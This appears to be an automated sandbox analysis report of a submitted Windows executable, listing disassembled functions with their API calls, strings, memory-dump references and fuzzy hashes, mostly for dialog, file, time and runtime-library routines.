                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction ID: 21e015dcfa55f95602b846101b6e4a5c48265e2ac73ab8b5819b17f7d237990c
                                                            • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                            • Instruction Fuzzy Hash: 723107B1A1474A8FCB18DF28C85116EBBE0FF95304F54452DE599C7342C734EA0ACB92
                                                            Function 001EE2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 001EE30E
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                              • Part of subcall function 001F1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00221030,?,001ED928,00000000,?,00000050,00221030), ref: 001F1DC4
                                                            • _strlen.LIBCMT ref: 001EE32F
                                                            • SetDlgItemTextW.USER32(?,0021E274,?), ref: 001EE38F
                                                            • GetWindowRect.USER32(?,?), ref: 001EE3C9
                                                            • GetClientRect.USER32(?,?), ref: 001EE3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 001EE475
                                                            • GetWindowRect.USER32(?,?), ref: 001EE4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 001EE4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 001EE4E3
                                                            • GetWindow.USER32(?,00000005), ref: 001EE4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 001EE51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 001EE58D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d$t!
                                                            • API String ID: 2407758923-2187398833
                                                            • Opcode ID: 7eca36074aad9ffd0b6a48219050aa298dd482f0fe9d991d8fd8f381be1cbb7f
                                                            • Instruction ID: 27fe362bcdba5aea6235d3cfa9a9687eb2ea83ba6f5fa00cca063b57f8e4ae93
                                                            • Opcode Fuzzy Hash: 7eca36074aad9ffd0b6a48219050aa298dd482f0fe9d991d8fd8f381be1cbb7f
                                                            • Instruction Fuzzy Hash: B281AE72208341AFD710DFA9DC89A6FBBE9EF89704F04091DFA88D7291D771E9058B52
                                                            Function 0020CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0020CB66
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C71E
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C730
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C742
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C754
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C766
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C778
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C78A
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C79C
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C7AE
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C7C0
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C7D2
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C7E4
                                                              • Part of subcall function 0020C701: _free.LIBCMT ref: 0020C7F6
                                                            • _free.LIBCMT ref: 0020CB5B
                                                              • Part of subcall function 00208DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?), ref: 00208DE2
                                                              • Part of subcall function 00208DCC: GetLastError.KERNEL32(?,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?,?), ref: 00208DF4
                                                            • _free.LIBCMT ref: 0020CB7D
                                                            • _free.LIBCMT ref: 0020CB92
                                                            • _free.LIBCMT ref: 0020CB9D
                                                            • _free.LIBCMT ref: 0020CBBF
                                                            • _free.LIBCMT ref: 0020CBD2
                                                            • _free.LIBCMT ref: 0020CBE0
                                                            • _free.LIBCMT ref: 0020CBEB
                                                            • _free.LIBCMT ref: 0020CC23
                                                            • _free.LIBCMT ref: 0020CC2A
                                                            • _free.LIBCMT ref: 0020CC47
                                                            • _free.LIBCMT ref: 0020CC5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID: h!
                                                            • API String ID: 161543041-847045497
                                                            • Opcode ID: 95eeb8ffd009641458cde6bfeb7b85782285a5bd2da7b8e436abb3e32830c34d
                                                            • Instruction ID: 6f985100d1cdce3bfca52ca5c003445c5bcf39e60b43098886f6633ba8516d62
                                                            • Opcode Fuzzy Hash: 95eeb8ffd009641458cde6bfeb7b85782285a5bd2da7b8e436abb3e32830c34d
                                                            • Instruction Fuzzy Hash: 12314EB16203079FEB21AF78D846B5BB7E9AF10314F24461AE589D61D3DE71ACA0CB10
                                                            Function 002096F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00209705
                                                              • Part of subcall function 00208DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?), ref: 00208DE2
                                                              • Part of subcall function 00208DCC: GetLastError.KERNEL32(?,?,0020C896,?,00000000,?,00000000,?,0020C8BD,?,00000007,?,?,0020CCBA,?,?), ref: 00208DF4
                                                            • _free.LIBCMT ref: 00209711
                                                            • _free.LIBCMT ref: 0020971C
                                                            • _free.LIBCMT ref: 00209727
                                                            • _free.LIBCMT ref: 00209732
                                                            • _free.LIBCMT ref: 0020973D
                                                            • _free.LIBCMT ref: 00209748
                                                            • _free.LIBCMT ref: 00209753
                                                            • _free.LIBCMT ref: 0020975E
                                                            • _free.LIBCMT ref: 0020976C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID: 0d!
                                                            • API String ID: 776569668-2530378367
                                                            • Opcode ID: c45a1f1430f5bc3120ecc7b5b782c182e4e95754d63aca7321a845532b807d8c
                                                            • Instruction ID: 395731ee849a1dd41188ae7a7898386e12100646cc802792aae9c15b2203b5c9
                                                            • Opcode Fuzzy Hash: c45a1f1430f5bc3120ecc7b5b782c182e4e95754d63aca7321a845532b807d8c
                                                            • Instruction Fuzzy Hash: B011A77612020AAFCB01EF64C842DDE3BB5EF14350B5155A1FB484F1A3DE31DA609F84
                                                            Function 001F9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 001F9736
                                                            • _wcslen.LIBCMT ref: 001F97D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 001F97E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 001F9806
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001F982D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1777411235-4209811716
                                                            • Opcode ID: 91cdb14dc07087bf6aabc466b96e3dae95f55792457386a4829a7f5741574f68
                                                            • Instruction ID: 5fca4112d670ac0602482844eed182282ad132e3a31149350beeedf872ac93a2
                                                            • Opcode Fuzzy Hash: 91cdb14dc07087bf6aabc466b96e3dae95f55792457386a4829a7f5741574f68
                                                            • Instruction Fuzzy Hash: 43316A325183097BD725BF30DC06FBB779CEFA2360F14021EF601961D2EB649A548BA5
                                                            Function 001FD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 001FD6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 001FD6ED
                                                              • Part of subcall function 001F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001EC116,00000000,.exe,?,?,00000800,?,?,?,001F8E3C), ref: 001F1FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 001FD709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 001FD720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 001FD734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 001FD75D
                                                            • DeleteObject.GDI32(00000000), ref: 001FD764
                                                            • GetWindow.USER32(00000000,00000002), ref: 001FD76D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                            • String ID: STATIC
                                                            • API String ID: 3820355801-1882779555
                                                            • Opcode ID: b31166b0def8859adbdccbce935bfc0e8c6c1acdb81e164960a3d0ccb5fa22ca
                                                            • Instruction ID: 2140ba0fb6a07ee17cf564d9befd430ec120a2371e5ad023451c40b2e7a6aff7
                                                            • Opcode Fuzzy Hash: b31166b0def8859adbdccbce935bfc0e8c6c1acdb81e164960a3d0ccb5fa22ca
                                                            • Instruction Fuzzy Hash: CD1136B61403187BE721FB70BC4EFBF769DAF51711F004210FB09E6091DBA48E0542A1
                                                            Function 00202E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 322700389-393685449
                                                            • Opcode ID: bdfde3b0668d5278e0b7faeb6577be3e82dbbe55a78d395413f0ef8c8e4f8ac7
                                                            • Instruction ID: 409cbfee09d20cebd8b3aed9a84614a8c3248274d0c3029a62b371b85cb6e8c6
                                                            • Opcode Fuzzy Hash: bdfde3b0668d5278e0b7faeb6577be3e82dbbe55a78d395413f0ef8c8e4f8ac7
                                                            • Instruction Fuzzy Hash: 7AB1893192030AEFCF25DFA4C8859AEB7B9BF18310F14415AE8056B293D731DA66CF91
                                                            Function 001E6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E6FAA
                                                            • _wcslen.LIBCMT ref: 001E7013
                                                            • _wcslen.LIBCMT ref: 001E7084
                                                              • Part of subcall function 001E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 001E7AAB
                                                              • Part of subcall function 001E7A9C: GetLastError.KERNEL32 ref: 001E7AF1
                                                              • Part of subcall function 001E7A9C: CloseHandle.KERNEL32(?), ref: 001E7B00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3122303884-3508440684
                                                            • Opcode ID: f4faf69db911cf13ccaf4e86fc8e2f957fe931cbd2ab872b36c80511ea752f04
                                                            • Instruction ID: bea3ec5545b0b005bfb0efdb59585dfe4f826013f7ae3693cabe98a32c2b07b2
                                                            • Opcode Fuzzy Hash: f4faf69db911cf13ccaf4e86fc8e2f957fe931cbd2ab872b36c80511ea752f04
                                                            • Instruction Fuzzy Hash: CA412AB1D08BC47AFB20E7719C46FEEB7ACAF25300F004455FA45A31C2D7706A948721
                                                            Function 001FB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 001E1316: GetDlgItem.USER32(00000000,00003021), ref: 001E135A
                                                              • Part of subcall function 001E1316: SetWindowTextW.USER32(00000000,002135F4), ref: 001E1370
                                                            • EndDialog.USER32(?,00000001), ref: 001FB610
                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 001FB637
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 001FB650
                                                            • SetWindowTextW.USER32(?,?), ref: 001FB661
                                                            • GetDlgItem.USER32(?,00000065), ref: 001FB66A
                                                            • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 001FB67E
                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 001FB694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Item$TextWindow$Dialog
                                                            • String ID: LICENSEDLG
                                                            • API String ID: 3214253823-2177901306
                                                            • Opcode ID: 759fd7d68aed9fc1d2155e74ced66ed5b0a5618f2b7c5789c0e15d2ee13bbd95
                                                            • Instruction ID: c1eebaf93889de9fa5722a9ec2efedf0efa880a9403200b910032bf79050d969
                                                            • Opcode Fuzzy Hash: 759fd7d68aed9fc1d2155e74ced66ed5b0a5618f2b7c5789c0e15d2ee13bbd95
                                                            • Instruction Fuzzy Hash: BB21A332648209BBD611DB66FD8DF7B3B7DEB4BBA1F011015FB05D60A1CB6299019631
                                                            Function 001FFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,A7D54EE3,00000001,00000000,00000000,?,?,001EAF6C,ROOT\CIMV2), ref: 001FFD99
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,001EAF6C,ROOT\CIMV2), ref: 001FFE14
                                                            • SysAllocString.OLEAUT32(00000000), ref: 001FFE1F
                                                            • _com_issue_error.COMSUPP ref: 001FFE48
                                                            • _com_issue_error.COMSUPP ref: 001FFE52
                                                            • GetLastError.KERNEL32(80070057,A7D54EE3,00000001,00000000,00000000,?,?,001EAF6C,ROOT\CIMV2), ref: 001FFE57
                                                            • _com_issue_error.COMSUPP ref: 001FFE6A
                                                            • GetLastError.KERNEL32(00000000,?,?,001EAF6C,ROOT\CIMV2), ref: 001FFE80
                                                            • _com_issue_error.COMSUPP ref: 001FFE93
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                            • String ID:
                                                            • API String ID: 1353541977-0
                                                            • Opcode ID: a1e0f2fe90afed781a9b7cc34f20912d9b57265ad9ffffa982327dca3e296b0a
                                                            • Instruction ID: 2b3252e238ff659c6a0415ce343c119fe842844e7870f0f6214a2aad086cee38
                                                            • Opcode Fuzzy Hash: a1e0f2fe90afed781a9b7cc34f20912d9b57265ad9ffffa982327dca3e296b0a
                                                            • Instruction Fuzzy Hash: 8341FA71A0021DABDB10DF64DC49BFEBBA8EF58710F11423DFA05E7292DB7499018BA4
                                                            Function 001EAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                            • API String ID: 3519838083-3505469590
                                                            • Opcode ID: 555cd8128877af973d13f1336fa6204fc09320ef3ad8693366ac01ebdca106c5
                                                            • Instruction ID: 5c09ff09fbbb1ff6f47f8ddeaa472763a0db6e9b19b315f066e96bb541677389
                                                            • Opcode Fuzzy Hash: 555cd8128877af973d13f1336fa6204fc09320ef3ad8693366ac01ebdca106c5
                                                            • Instruction Fuzzy Hash: 5B718A70A00659EFDB14DFA5DC999AFBBB9FF58310B14415DF512A72A0CB30AE42CB60
                                                            Function 001E9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 001E9387
                                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001E93AA
                                                            • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 001E93C9
                                                              • Part of subcall function 001EC29A: _wcslen.LIBCMT ref: 001EC2A2
                                                              • Part of subcall function 001F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,001EC116,00000000,.exe,?,?,00000800,?,?,?,001F8E3C), ref: 001F1FD1
                                                            • _swprintf.LIBCMT ref: 001E9465
                                                              • Part of subcall function 001E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001E40A5
                                                            • MoveFileW.KERNEL32(?,?), ref: 001E94D4
                                                            • MoveFileW.KERNEL32(?,?), ref: 001E9514
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660355922.0000000000213000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.000000000021E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000225000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660380577.0000000000242000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1660444117.0000000000243000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1e0000_KzLetzDiM8.jbxd
                                                            Similarity
                                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: rtmp%d
                                                            • API String ID: 3726343395-3303766350
                                                            • Opcode ID: 85b86cceb9c797bee3859074bab033cc44282dfee9500ac4012f7ca71c86a7f4
                                                            • Instruction ID: ba9f9f7a840b4a30271c90258bfcb65192aeb3158428a93f50049f686435c25f
                                                            • Opcode Fuzzy Hash: 85b86cceb9c797bee3859074bab033cc44282dfee9500ac4012f7ca71c86a7f4
                                                            • Instruction Fuzzy Hash: 5D419971900699A6CF21EB61CD45EEF737CAF65340F0448A6B64AE3051DB388B89CB60
                                                            Function 001F1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __aulldiv.LIBCMT ref: 001F122E
                                                              • Part of subcall function 001EB146: GetVersionExW.KERNEL32(?), ref: 001EB16B
                                                            • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 001F1251
                                                            • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 001F1263
                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 001F1274
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F1284
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 001F1294
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 001F12CF
                                                            • __aullrem.LIBCMT ref: 001F1379
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1660313153.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
                                                            • Associated: 00000000.00000002.1660282205.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
